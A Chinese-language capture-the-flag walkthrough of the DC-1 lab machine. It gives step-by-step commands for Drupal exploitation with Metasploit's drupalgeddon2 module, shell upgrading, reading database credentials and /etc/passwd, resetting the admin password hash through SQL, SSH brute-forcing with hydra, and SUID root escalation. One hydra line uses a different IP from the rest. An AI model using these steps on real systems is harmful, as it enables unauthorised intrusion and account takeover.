DC-1

DC-1

nmap -sP 192.168.93.0/24#扫描局域网内的ip确定主机
nmap -sV 192.168.93.79#扫描靶机开方的端口

发现开放三个端口，我们先访问80端口。

看到了Drupal,启动msfconsole,并寻找相关攻击模块。

msfconsole
search Drupal

选择最新的模块进行攻击。

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST 192.168.93.79
run

拿到meterpreter会话,列出当前文件，发现flag1.txt。

ls
cat flag1.txt

根据该提示，我们去查询相关配置文件，Drupal的配置文件存于 ./sites/default/settings.php

拿到flag2，同时发现数据库账号和密码。

输入shell切换壳。

登陆数据库发现没有回显，可能是因为不是交互式shell。

利用python触发交互示shell。

python -c 'import pty;pty.spawn("/bin/sh")'

登陆数据库。

进入数据库drupaldb,查表，进入users,再把东西都列出来，发现admin和其密码。

修改admin密码:

php scripts/password-hash.sh 123456#返回shell输入

update users set pass="$S$D0EhkXn49TFszpwkBNaPbktisjrdSzUqOwL3pbTcUZ5YfsCyd4Q0" where uid=1;#mysql登陆数据库后使用

修改后登陆网站，找到flag3

根据提示返回终端，查找相关文件。

cat /etc/passwd

这里的flag应该是一个用户，之前扫描端口有一个ssh服务的端口，猜测用该需要用ssh登陆该用户，但不知道密码，所有需要爆破。

hydra -l flag4 -P /usr/share/john/password.lst 192.168.78.147 ssh -vV -f

得到密码为orange，进行ssh连接。

ssh flag4@192.168.93.79

根据提示得知flag可能在root目录下，但尝试进入失败。

查看当前用户

想办法提升为root。

这里使用SUID提权。

成功提升为root用户。

最后找到flag。